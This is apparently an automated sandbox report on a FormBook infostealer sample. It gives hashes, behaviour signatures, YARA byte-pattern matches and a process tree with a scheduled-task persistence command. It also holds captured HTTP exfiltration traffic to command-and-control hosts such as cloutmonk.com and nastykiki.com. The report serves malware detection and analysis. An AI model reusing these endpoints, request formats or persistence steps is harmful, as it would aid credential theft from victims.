Loading ...

Play interactive tourEdit tour

Analysis Report vyac9eSGFdsBaas.exe

Overview

General Information

Sample Name:vyac9eSGFdsBaas.exe
Analysis ID:284767
MD5:9f17b7998ba35f50527dbd5264c637a4
SHA1:32c51e444e34a5412d5d9fc51093673ba585de55
SHA256:bffc51435a1d5a46ec9199c40b72ca08f2708d7384ea9c1a625cc737c73b6eb1

Most interesting Screenshot:

Detection

FormBook
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Detected FormBook malware
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Sigma detected: Scheduled temp file as task from temp location
System process connects to network (likely due to code injection or exploit)
Yara detected AntiVM_3
Yara detected FormBook
.NET source code contains potential unpacker
Binary contains a suspicious time stamp
Injects a PE file into a foreign processes
Machine Learning detection for dropped file
Machine Learning detection for sample
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Modifies the prolog of user mode functions (user mode inline hooks)
Queues an APC in another process (thread injection)
Sample uses process hollowing technique
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Tries to detect virtualization through RDTSC time measurements
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file access)
Uses netstat to query active network connections and open ports
Uses schtasks.exe or at.exe to add and modify task schedules
Antivirus or Machine Learning detection for unpacked file
Checks if the current process is being debugged
Contains capabilities to detect virtual machines
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to read the PEB
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Drops PE files
Enables debug privileges
Found inlined nop instructions (likely shell or obfuscated code)
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

Startup

  • System is w10x64
  • vyac9eSGFdsBaas.exe (PID: 6604 cmdline: 'C:\Users\user\Desktop\vyac9eSGFdsBaas.exe' MD5: 9F17B7998BA35F50527DBD5264C637A4)
    • schtasks.exe (PID: 6832 cmdline: 'C:\Windows\System32\schtasks.exe' /Create /TN 'Updates\oDcrHUXLZvF' /XML 'C:\Users\user\AppData\Local\Temp\tmp5B2B.tmp' MD5: 15FF7D8324231381BAD48A052F85DF04)
      • conhost.exe (PID: 6852 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
    • vyac9eSGFdsBaas.exe (PID: 5576 cmdline: {path} MD5: 9F17B7998BA35F50527DBD5264C637A4)
      • explorer.exe (PID: 3508 cmdline: MD5: AD5296B280E8F522A8A897C96BAB0E1D)
        • NETSTAT.EXE (PID: 7000 cmdline: C:\Windows\SysWOW64\NETSTAT.EXE MD5: 4E20FF629119A809BC0E7EE2D18A7FDB)
  • cleanup

Malware Configuration

No configs have been found

Yara Overview

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000004.00000002.432585496.0000000001150000.00000040.00000001.sdmpJoeSecurity_FormBookYara detected FormBookJoe Security
    00000004.00000002.432585496.0000000001150000.00000040.00000001.sdmpFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
    • 0x98e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0x9b52:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0x15675:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
    • 0x15161:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
    • 0x15777:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
    • 0x158ef:$sequence_4: 5D C3 8D 50 7C 80 FA 07
    • 0xa56a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
    • 0x143dc:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
    • 0xb263:$sequence_7: 66 89 0C 02 5B 8B E5 5D
    • 0x1b257:$sequence_8: 3C 54 74 04 3C 74 75 F4
    • 0x1c26a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
    00000004.00000002.432585496.0000000001150000.00000040.00000001.sdmpFormbookdetect Formbook in memoryJPCERT/CC Incident Response Group
    • 0x18339:$sqlite3step: 68 34 1C 7B E1
    • 0x1844c:$sqlite3step: 68 34 1C 7B E1
    • 0x18368:$sqlite3text: 68 38 2A 90 C5
    • 0x1848d:$sqlite3text: 68 38 2A 90 C5
    • 0x1837b:$sqlite3blob: 68 53 D8 7F 8C
    • 0x184a3:$sqlite3blob: 68 53 D8 7F 8C
    00000000.00000002.390879561.0000000003F08000.00000004.00000001.sdmpJoeSecurity_FormBookYara detected FormBookJoe Security
      00000000.00000002.390879561.0000000003F08000.00000004.00000001.sdmpFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
      • 0x92508:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
      • 0x92772:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
      • 0x141148:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
      • 0x1413b2:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
      • 0x9e295:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
      • 0x14ced5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
      • 0x9dd81:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
      • 0x14c9c1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
      • 0x9e397:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
      • 0x14cfd7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
      • 0x9e50f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
      • 0x14d14f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
      • 0x9318a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
      • 0x141dca:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
      • 0x9cffc:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
      • 0x14bc3c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
      • 0x93e83:$sequence_7: 66 89 0C 02 5B 8B E5 5D
      • 0x142ac3:$sequence_7: 66 89 0C 02 5B 8B E5 5D
      • 0xa3e77:$sequence_8: 3C 54 74 04 3C 74 75 F4
      • 0x152ab7:$sequence_8: 3C 54 74 04 3C 74 75 F4
      • 0xa4e8a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
      Click to see the 17 entries

      Unpacked PEs

      SourceRuleDescriptionAuthorStrings
      4.2.vyac9eSGFdsBaas.exe.400000.0.raw.unpackJoeSecurity_FormBookYara detected FormBookJoe Security
        4.2.vyac9eSGFdsBaas.exe.400000.0.raw.unpackFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
        • 0x98e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
        • 0x9b52:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
        • 0x15675:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
        • 0x15161:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
        • 0x15777:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
        • 0x158ef:$sequence_4: 5D C3 8D 50 7C 80 FA 07
        • 0xa56a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
        • 0x143dc:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
        • 0xb263:$sequence_7: 66 89 0C 02 5B 8B E5 5D
        • 0x1b257:$sequence_8: 3C 54 74 04 3C 74 75 F4
        • 0x1c26a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
        4.2.vyac9eSGFdsBaas.exe.400000.0.raw.unpackFormbookdetect Formbook in memoryJPCERT/CC Incident Response Group
        • 0x18339:$sqlite3step: 68 34 1C 7B E1
        • 0x1844c:$sqlite3step: 68 34 1C 7B E1
        • 0x18368:$sqlite3text: 68 38 2A 90 C5
        • 0x1848d:$sqlite3text: 68 38 2A 90 C5
        • 0x1837b:$sqlite3blob: 68 53 D8 7F 8C
        • 0x184a3:$sqlite3blob: 68 53 D8 7F 8C
        4.2.vyac9eSGFdsBaas.exe.400000.0.unpackJoeSecurity_FormBookYara detected FormBookJoe Security
          4.2.vyac9eSGFdsBaas.exe.400000.0.unpackFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
          • 0x8ae8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
          • 0x8d52:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
          • 0x14875:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
          • 0x14361:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
          • 0x14977:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
          • 0x14aef:$sequence_4: 5D C3 8D 50 7C 80 FA 07
          • 0x976a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
          • 0x135dc:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
          • 0xa463:$sequence_7: 66 89 0C 02 5B 8B E5 5D
          • 0x1a457:$sequence_8: 3C 54 74 04 3C 74 75 F4
          • 0x1b46a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
          Click to see the 1 entries

          Sigma Overview

          System Summary:

          barindex
          Sigma detected: Scheduled temp file as task from temp locationShow sources
          Source: Process startedAuthor: Joe Security: Data: Command: 'C:\Windows\System32\schtasks.exe' /Create /TN 'Updates\oDcrHUXLZvF' /XML 'C:\Users\user\AppData\Local\Temp\tmp5B2B.tmp', CommandLine: 'C:\Windows\System32\schtasks.exe' /Create /TN 'Updates\oDcrHUXLZvF' /XML 'C:\Users\user\AppData\Local\Temp\tmp5B2B.tmp', CommandLine|base64offset|contains: *j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: 'C:\Users\user\Desktop\vyac9eSGFdsBaas.exe' , ParentImage: C:\Users\user\Desktop\vyac9eSGFdsBaas.exe, ParentProcessId: 6604, ProcessCommandLine: 'C:\Windows\System32\schtasks.exe' /Create /TN 'Updates\oDcrHUXLZvF' /XML 'C:\Users\user\AppData\Local\Temp\tmp5B2B.tmp', ProcessId: 6832

          Signature Overview

          Click to jump to signature section

          Show All Signature Results

          AV Detection:

          barindex
          Multi AV Scanner detection for domain / URLShow sources
          Source: http://www.camdio.xyz/k8b/Virustotal: Detection: 6%Perma Link
          Multi AV Scanner detection for dropped fileShow sources
          Source: C:\Users\user\AppData\Roaming\oDcrHUXLZvF.exeVirustotal: Detection: 21%Perma Link
          Multi AV Scanner detection for submitted fileShow sources
          Source: vyac9eSGFdsBaas.exeVirustotal: Detection: 21%Perma Link
          Yara detected FormBookShow sources
          Source: Yara matchFile source: 00000004.00000002.432585496.0000000001150000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000002.390879561.0000000003F08000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000C.00000002.632020204.00000000036A0000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000C.00000002.631947208.0000000003660000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000C.00000002.631039100.0000000002F70000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000004.00000002.433229610.0000000001180000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000004.00000002.432161870.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 4.2.vyac9eSGFdsBaas.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 4.2.vyac9eSGFdsBaas.exe.400000.0.unpack, type: UNPACKEDPE
          Machine Learning detection for dropped fileShow sources
          Source: C:\Users\user\AppData\Roaming\oDcrHUXLZvF.exeJoe Sandbox ML: detected
          Machine Learning detection for sampleShow sources
          Source: vyac9eSGFdsBaas.exeJoe Sandbox ML: detected
          Source: 4.2.vyac9eSGFdsBaas.exe.400000.0.unpackAvira: Label: TR/Crypt.ZPACK.Gen
          Source: C:\Users\user\Desktop\vyac9eSGFdsBaas.exeCode function: 4x nop then pop edi4_2_00416BF6
          Source: C:\Users\user\Desktop\vyac9eSGFdsBaas.exeCode function: 4x nop then pop edi4_2_0040E38C
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4x nop then pop edi12_2_02F7E38C
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4x nop then pop edi12_2_02F86C45

          Networking:

          barindex
          Uses netstat to query active network connections and open portsShow sources
          Source: unknownProcess created: C:\Windows\SysWOW64\NETSTAT.EXE C:\Windows\SysWOW64\NETSTAT.EXE
          Source: global trafficHTTP traffic detected: GET /k8b/?GZFPC=l8hWUFLJuml4eYku4/VYU6RSnNDRvqfvURXgu3llAvj/NGacI/RacADph16unSeN08+r&Jzr=WbI4nLcxNx9xB HTTP/1.1Host: www.cloutmonk.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /k8b/?GZFPC=VC7ph94nBwHqpUSYspNTCN309MDkymEOcmQ6ikEgb4YKagxI1RKoe1AlMLDdw+SPwNPO&Jzr=WbI4nLcxNx9xB HTTP/1.1Host: www.nastykiki.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /k8b/?GZFPC=/9OlxiJfDFCR+kV/3jQOp8a9FKVAShy06VW92GW7Kq51jBaeGYNY0G4LSnjLLhaFT7RV&Jzr=WbI4nLcxNx9xB HTTP/1.1Host: www.coin-1234.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: Joe Sandbox ViewASN Name: CNSERVERSUS CNSERVERSUS
          Source: Joe Sandbox ViewASN Name: GOOGLE-2US GOOGLE-2US
          Source: Joe Sandbox ViewASN Name: AMAZON-02US AMAZON-02US
          Source: global trafficHTTP traffic detected: POST /k8b/ HTTP/1.1Host: www.cloutmonk.comConnection: closeContent-Length: 411Cache-Control: no-cacheOrigin: http://www.cloutmonk.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.cloutmonk.com/k8b/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 47 5a 46 50 43 3d 74 65 74 73 4b 6c 76 44 6c 6e 68 34 4d 71 6c 63 6f 36 67 43 44 63 31 4f 78 65 62 46 6f 70 58 39 4b 46 47 5f 33 51 31 70 51 66 4f 39 4a 6b 4f 57 46 66 67 70 56 31 76 74 30 6e 4f 73 37 6d 32 49 79 65 65 6c 54 54 53 56 4b 6e 42 6a 6f 66 36 6e 4e 36 58 68 76 52 47 59 6d 6b 28 6b 51 68 4c 45 33 73 79 46 67 59 74 47 62 79 4a 4d 59 44 36 70 62 75 49 35 39 42 52 64 66 79 41 50 47 74 6f 4b 4d 5a 45 63 28 74 7e 62 77 48 68 51 45 59 62 58 48 78 35 6a 6b 53 74 7a 69 30 6e 36 32 77 50 75 69 73 6a 34 66 66 47 4e 59 66 47 72 45 62 73 51 54 53 30 6d 63 74 30 61 6c 36 72 79 68 6c 28 65 57 6f 30 6a 62 6d 50 70 54 49 33 32 75 55 6f 53 7a 73 5a 41 4f 72 79 62 36 51 39 73 47 6e 77 2d 39 32 74 77 58 46 37 79 75 7a 4b 6c 57 72 78 34 56 67 67 38 52 6c 57 73 6c 63 6e 76 38 42 6a 5f 61 63 66 7a 6d 69 45 67 6c 67 67 77 34 75 46 44 62 64 36 52 56 51 74 4a 54 69 50 62 4c 70 66 6a 6a 52 72 74 61 42 54 6f 6c 71 69 47 6f 53 67 78 6e 79 74 76 5a 32 58 45 62 79 68 32 42 6f 79 71 6b 70 7e 59 63 61 65 50 68 6f 43 31 45 77 6c 49 75 63 56 6b 33 79 58 4f 73 51 51 34 43 6c 6b 47 50 30 59 67 7e 50 4b 4e 62 45 78 43 65 4a 33 79 34 50 77 56 79 72 53 31 56 70 31 68 4f 4f 67 45 38 35 77 30 76 55 69 35 39 50 54 38 61 54 69 74 77 51 29 2e 00 00 00 00 00 00 00 00 Data Ascii: GZFPC=tetsKlvDlnh4Mqlco6gCDc1OxebFopX9KFG_3Q1pQfO9JkOWFfgpV1vt0nOs7m2IyeelTTSVKnBjof6nN6XhvRGYmk(kQhLE3syFgYtGbyJMYD6pbuI59BRdfyAPGtoKMZEc(t~bwHhQEYbXHx5jkStzi0n62wPuisj4ffGNYfGrEbsQTS0mct0al6ryhl(eWo0jbmPpTI32uUoSzsZAOryb6Q9sGnw-92twXF7yuzKlWrx4Vgg8RlWslcnv8Bj_acfzmiEglggw4uFDbd6RVQtJTiPbLpfjjRrtaBTolqiGoSgxnytvZ2XEbyh2Boyqkp~YcaePhoC1EwlIucVk3yXOsQQ4ClkGP0Yg~PKNbExCeJ3y4PwVyrS1Vp1hOOgE85w0vUi59PT8aTitwQ).
          Source: global trafficHTTP traffic detected: POST /k8b/ HTTP/1.1Host: www.cloutmonk.comConnection: closeContent-Length: 186031Cache-Control: no-cacheOrigin: http://www.cloutmonk.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.cloutmonk.com/k8b/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 47 5a 46 50 43 3d 74 65 74 73 4b 67 53 79 6b 58 6c 70 49 65 52 64 70 71 77 61 56 76 74 63 6e 73 75 42 71 2d 62 70 48 33 7a 6b 33 51 6c 74 49 75 66 67 44 6e 57 57 4d 39 49 69 57 6c 76 73 79 6e 4f 76 71 32 79 5a 37 70 69 2d 54 53 6e 36 4b 6e 35 6b 6a 38 79 69 4e 71 58 74 75 78 43 6b 33 45 61 32 51 6a 76 62 33 4f 65 6a 73 34 68 47 65 43 52 4f 61 69 4b 4d 63 73 39 6f 30 56 77 58 4d 6e 30 4b 47 64 45 79 4e 37 34 75 75 73 69 5a 68 6c 39 5a 42 59 71 2d 4e 47 74 73 71 69 35 30 37 46 7a 74 31 54 72 71 6e 74 69 50 55 39 7e 4f 55 4d 32 62 42 63 41 6d 58 6e 51 78 50 4e 6c 70 6c 35 37 4d 74 7a 28 44 64 50 56 73 65 55 71 4f 59 64 50 30 68 48 52 4e 6b 2d 67 77 64 36 43 30 79 79 6c 6e 44 32 63 4f 7e 7a 68 67 64 45 69 4f 6f 42 75 66 5a 2d 31 51 57 7a 73 30 54 6d 4f 54 28 50 47 74 7a 41 44 6e 4b 4f 7a 56 70 69 46 32 6a 67 67 6b 79 39 4e 53 65 6f 65 57 47 77 38 71 53 6c 37 48 4f 35 7a 69 6d 55 76 68 55 45 33 31 32 75 75 30 78 79 51 4a 6a 53 59 74 5a 6c 6e 76 49 53 67 33 59 61 4c 6f 6b 70 28 68 63 62 66 6b 69 36 7e 31 47 67 45 55 36 64 56 6f 78 79 57 53 71 41 41 36 5a 46 5a 4e 50 30 41 67 38 37 44 6f 56 58 42 43 61 61 28 31 28 73 6f 56 78 62 53 31 5a 4a 30 46 44 39 56 4e 39 72 39 41 72 32 69 79 37 70 69 64 57 48 69 6a 7a 61 73 6d 57 56 67 75 72 74 45 73 54 45 4b 4d 71 58 65 53 7e 30 67 64 55 43 67 58 68 75 6f 75 48 66 48 48 70 4a 46 32 79 36 6b 54 64 6f 47 78 50 59 38 33 7e 75 59 5f 6c 69 45 48 72 65 45 34 6e 4a 76 4b 44 57 6f 67 41 4f 49 4e 46 48 31 41 44 62 69 75 63 55 75 73 7a 4b 7e 30 5a 38 61 2d 72 4c 76 68 51 70 6c 63 4f 6e 6b 5f 46 57 75 58 34 61 6e 61 55 6b 44 43 68 76 4e 47 47 46 48 62 72 61 42 4d 54 39 35 5a 58 4c 30 70 4f 79 33 46 6e 45 4f 70 72 6a 57 65 45 73 73 74 38 76 51 70 52 46 49 6f 30 70 73 6b 56 50 6d 58 56 78 6a 67 51 62 44 6b 33 47 53 51 38 43 75 64 4e 66 34 6d 63 65 72 6d 6c 66 41 35 56 32 35 65 4d 42 53 37 6a 57 70 66 6b 6a 46 69 41 69 4f 56 58 32 56 39 56 34 75 79 6c 6a 74 4f 73 54 34 39 7e 31 57 42 41 55 56 2d 61 66 75 68 45 56 6e 54 63 38 65 38 79 75 70 33 43 4d 6c 71 7e 72 4e 46 5a 4f 30 66 59 36 6e 75 78 6e 6b 4e 50 42 33 70 49 35 79 78 4e 42 54 6c 47 58 44 36 51 71 38 56 7a 72 68 73 38 65 43 77 56 38 30 74 5a 50 6c 69 4f 67 71 42 51 30 6d 4d 70 55 6c 76 6e 6b 6a 57 4e 33 76 57 6c 30 76 53 62 49 73 5a 54 72 6a 46 78 78 64 35 59 4a 53 75 4c 56 71 75 64 4f 6e 4a 4c 77 6d 7a 52 4e 28 66 72 70 4a 2d 64 58 62 37 72 44 43 42 38 49 58 64 61 7a 62 50 6a 41 6d 63 6c 6a 56 33 28 6f 78 59 43 6f 7e 6b 75 49 70 46 4f 35 52 50 73 65 5a 39 41 4b 39 62 6e 6c 6c 79 38 74 37 42 53 47 44 54 6b 33 57 42 6f 5f 6f 36 44 4e 50 4d 38 6a 5a 47 6f 62 41 73 78 48 28 6
          Source: global trafficHTTP traffic detected: POST /k8b/ HTTP/1.1Host: www.nastykiki.comConnection: closeContent-Length: 411Cache-Control: no-cacheOrigin: http://www.nastykiki.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.nastykiki.com/k8b/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 47 5a 46 50 43 3d 64 67 33 54 28 61 78 57 50 54 66 62 32 48 58 4b 78 5a 63 74 44 34 76 6b 33 73 61 35 6b 33 55 76 48 51 39 46 77 48 49 76 4c 4c 41 49 51 6a 41 59 36 79 48 65 62 78 64 5f 51 4a 37 38 38 4e 43 65 7a 39 75 51 64 46 6a 51 41 56 57 64 59 67 32 68 4a 6d 7e 5f 61 6e 57 57 35 72 75 31 62 7a 4f 2d 6c 7a 34 69 4d 7a 61 75 31 2d 4a 72 4e 5f 33 43 6d 6e 31 6a 41 72 55 63 41 67 4e 4d 37 66 57 30 43 54 48 52 68 73 33 37 58 47 44 30 49 5a 48 59 41 39 30 46 71 34 56 64 42 6e 4d 4f 39 30 6a 4c 62 6a 35 64 41 61 44 77 4b 6c 74 39 65 48 57 69 76 77 6e 75 63 75 73 46 38 4b 54 6f 56 32 53 67 64 46 67 6b 39 69 56 41 54 38 48 34 7a 47 4b 6c 46 49 64 6e 45 57 31 59 74 2d 77 56 61 6d 55 5f 65 6e 4d 6b 34 46 38 5a 51 30 76 38 73 53 67 78 48 76 42 58 6b 70 33 65 51 4d 65 2d 41 7a 6f 41 5a 78 65 5f 32 59 65 62 42 48 41 66 74 47 56 70 44 5f 41 65 50 65 61 4a 5a 4a 34 30 78 5a 70 50 49 62 6d 34 56 7a 67 38 5a 79 5a 66 4f 48 72 44 28 36 46 70 64 49 50 54 50 54 4b 55 7e 71 4c 6d 42 73 42 4e 4d 6f 38 39 6c 4e 57 64 64 7a 44 36 4b 58 31 6a 79 76 30 33 28 36 59 76 4d 4c 45 61 69 5a 57 70 41 4c 70 78 67 57 58 2d 53 79 58 5a 7e 72 63 57 72 6b 44 64 4d 44 43 4f 4a 6e 54 72 65 51 31 7a 43 33 51 6d 4e 47 28 58 6b 52 37 64 6d 77 29 2e 00 00 00 00 00 00 00 00 Data Ascii: GZFPC=dg3T(axWPTfb2HXKxZctD4vk3sa5k3UvHQ9FwHIvLLAIQjAY6yHebxd_QJ788NCez9uQdFjQAVWdYg2hJm~_anWW5ru1bzO-lz4iMzau1-JrN_3Cmn1jArUcAgNM7fW0CTHRhs37XGD0IZHYA90Fq4VdBnMO90jLbj5dAaDwKlt9eHWivwnucusF8KToV2SgdFgk9iVAT8H4zGKlFIdnEW1Yt-wVamU_enMk4F8ZQ0v8sSgxHvBXkp3eQMe-AzoAZxe_2YebBHAftGVpD_AePeaJZJ40xZpPIbm4Vzg8ZyZfOHrD(6FpdIPTPTKU~qLmBsBNMo89lNWddzD6KX1jyv03(6YvMLEaiZWpALpxgWX-SyXZ~rcWrkDdMDCOJnTreQ1zC3QmNG(XkR7dmw).
          Source: global trafficHTTP traffic detected: POST /k8b/ HTTP/1.1Host: www.nastykiki.comConnection: closeContent-Length: 186031Cache-Control: no-cacheOrigin: http://www.nastykiki.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.nastykiki.com/k8b/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 47 5a 46 50 43 3d 64 67 33 54 28 62 49 6e 63 7a 62 47 39 55 7a 50 77 4e 41 31 53 4a 66 32 7a 76 66 7a 79 58 38 52 4b 6a 4a 76 77 47 34 72 54 36 52 50 58 44 77 59 38 30 62 5a 54 78 64 38 57 4a 37 5f 71 4e 50 68 76 64 32 6d 64 42 79 37 41 56 65 65 42 7a 7e 6b 49 32 7e 6b 62 48 71 41 37 72 37 6e 62 78 4c 65 6d 52 55 71 61 6a 57 75 78 4f 68 70 52 74 66 4a 76 47 70 6f 63 4b 35 59 43 67 55 63 6e 34 6d 6d 43 31 50 4a 78 35 54 35 51 33 6e 46 47 36 4f 46 58 38 38 4b 6b 49 42 61 66 78 64 43 7a 7a 54 50 57 42 51 67 46 59 72 7a 44 31 6c 30 55 6c 66 58 6b 6c 57 55 65 36 6f 76 38 4e 75 66 63 6c 47 39 58 6b 38 53 34 51 77 56 4c 64 53 2d 32 78 66 32 49 75 4a 30 43 58 45 36 68 63 6f 34 64 32 34 6d 54 43 4a 37 39 6b 6b 69 56 41 28 77 6e 43 77 4e 47 4d 74 6c 72 49 6d 70 64 72 44 6e 4f 48 59 32 63 7a 7a 44 37 59 65 34 48 48 41 62 31 42 68 52 47 4e 73 46 59 5f 71 6e 59 4b 59 67 37 71 74 4d 4c 5a 75 6b 4c 69 35 36 62 6a 42 54 45 55 53 6a 36 61 78 69 64 34 37 77 42 7a 4b 49 31 4a 69 4c 42 73 42 37 4d 70 39 71 71 63 43 64 64 69 50 70 49 32 31 56 35 50 30 50 7a 4b 49 78 56 4e 6f 4b 69 5a 65 70 42 35 78 66 68 68 7a 2d 46 54 48 61 7e 50 49 57 71 30 44 64 55 7a 44 6d 61 32 4b 68 61 43 77 45 52 45 67 49 50 54 7e 30 77 6c 79 6a 7e 6c 73 71 49 41 64 6b 30 33 52 64 63 65 5a 44 6d 36 55 6f 43 78 49 66 78 52 66 30 42 6a 72 4c 43 44 32 7a 59 42 59 30 59 71 69 54 41 67 68 44 4f 41 63 5f 53 41 68 53 6e 64 6b 71 4e 75 57 64 61 4f 39 2d 6e 30 41 4f 4b 4f 72 5a 6a 30 79 6b 44 50 33 77 37 5f 5a 53 65 70 39 4a 59 4b 79 48 28 38 30 67 69 36 65 4d 72 65 61 2d 78 58 6c 76 66 6b 33 76 63 4e 66 48 4b 37 4b 33 50 30 39 33 6e 39 68 61 55 34 35 41 44 68 41 5a 50 48 51 49 33 39 68 75 41 6f 55 4d 62 48 28 54 76 67 46 4a 6f 30 46 4c 56 46 6e 31 4a 64 62 39 36 76 4f 4d 46 37 53 6d 37 65 67 76 51 65 78 37 50 32 37 47 35 62 30 54 49 4a 70 6f 6b 70 68 4b 59 6e 55 43 6d 4b 62 4f 76 39 4d 4a 51 6b 28 35 43 79 70 49 69 71 36 75 49 66 38 6b 76 78 4f 68 69 50 31 68 6b 41 66 30 34 32 5a 52 6d 66 6e 61 32 48 56 6b 4a 4d 4d 67 6e 74 63 53 38 67 7e 44 44 4d 58 48 35 44 76 32 77 78 67 55 76 5f 6d 74 55 44 4b 6b 45 65 66 31 56 57 67 65 6b 68 6b 44 45 52 4f 39 35 78 70 59 4c 79 72 6a 39 30 64 45 70 45 78 59 4c 52 57 61 72 39 57 78 4b 49 64 30 4d 52 66 32 7e 56 58 42 75 54 38 5a 79 49 38 71 39 79 64 6f 44 75 65 77 6e 59 50 45 4f 6f 28 36 55 6c 54 30 76 44 67 5a 48 43 35 2d 7a 43 73 6e 59 4a 35 50 46 39 78 71 4e 57 5a 6f 48 6e 62 39 62 59 4f 46 4b 57 66 6c 28 68 46 74 53 62 7a 46 47 41 4a 62 68 45 76 66 47 5f 52 74 7e 7a 33 70 53 68 70 45 69 55 45 49 4b 6b 6c 63 77 59 49 38 67 4f 59 63 42 78 36 4d 42 62 65 36 48 33 70 5
